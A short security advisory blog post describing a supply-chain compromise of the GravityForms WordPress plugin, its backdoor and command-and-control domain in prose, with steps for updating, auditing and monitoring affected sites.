Recently, analysis by security researchers at Pathstack had uncovered a serious vulnerability affecting the widely-used WordPress plugin, GravityForms. It’s a popular contact form build plugin powering forms on websites (from small blogs to large enterprise) worldwide
A Hidden Threat in a Trusted Plugin
According to detailed findings from security analysis, certain versions of GravityForms downloaded directly from the official site contained malicious code. This appears to be part of a targeted supply chain attack, where attackers inject malicious scripts into legitimate software updates. The compromised plugin could then be exploited to communicate with external servers, execute commands remotely, or even gain unauthorized access to affected websites.
The malicious code was embedded within core plugin files, and a secondary backdoor was also identified. This backdoor can enable attackers to create administrator accounts, upload malicious files, or list server directories—all without the site owner’s knowledge.
Once installed, the compromised plugin connects to a newly registered domain, gravityapi.org, which was only created days before the attack. It sends information about the website—such as URL, WordPress version, server details—to this malicious domain. The attacker can then respond by sending back malicious code, which the plugin decodes and executes on the server. This effectively allows remote command execution, paving the way for full control over the affected site.
Additionally, the backdoor can be triggered through specific requests, enabling malicious actors to create new admin accounts, delete users, upload files, or perform server directory scans—all remotely and silently.
GravityForms is used by a vast number of websites—estimates suggest over one million active installations worldwide. It’s a premium plugin available through license directly from the vendor, and is not available directly on the official WordPress.org repository. While the WordPress plugins repository as an official channel generally adds a layer of trust, it isn’t with guarantee.
Users or website owners utilizing the Gravity Forms plugin should:
- Update Plugin: The developer has released a clean updated version (2.9.13) to patch the vulnerability. Learn more about updating on the official docs.
- Audit Site: Check for unfamiliar users, files or code snippets, especially in core plugin files like common.php, notification.php, or class-settings.php. Security tools or serviecs can also further assist with in-depth, in-line scanning.
- Monitor Network Traffic: Look for unusual connections to suspicious domains such as gravityapi.org or gravityapi.io.
Protecting your website is an ongoing process. And supply chain attacks can happen even with trusted vendors, so vigilance and maintaining rigorous update and security practices are essential.
Leave a Reply